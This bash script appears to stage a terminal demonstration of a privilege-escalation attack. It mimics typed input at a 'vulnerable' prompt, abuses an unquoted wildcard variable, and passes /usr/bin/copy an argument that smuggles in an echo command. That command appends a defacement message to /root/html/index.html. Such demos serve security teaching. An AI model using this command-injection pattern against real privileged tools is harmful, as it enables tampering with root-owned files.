#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "id" | pv -qL 10 
id
echo -n "vulnerable:2> "
sleep 1
echo "dir='*'" | pv -qL 10 
dir='*'
echo -n "vulnerable:2> "
sleep 1
echo "mkdir /home/dev_user/stuff/\$dir" | pv -qL 10 
mkdir /home/dev_user/stuff/$dir
echo -n "vulnerable:2> "
sleep 1
echo "/usr/bin/copy 'echo \"Hello again! From: @JR_Knox1977\" >> /root/html/index.html'" | pv -qL 10 
/usr/bin/copy 'echo "Hello again! From: @JR_Knox1977" >> /root/html/index.html'
exit
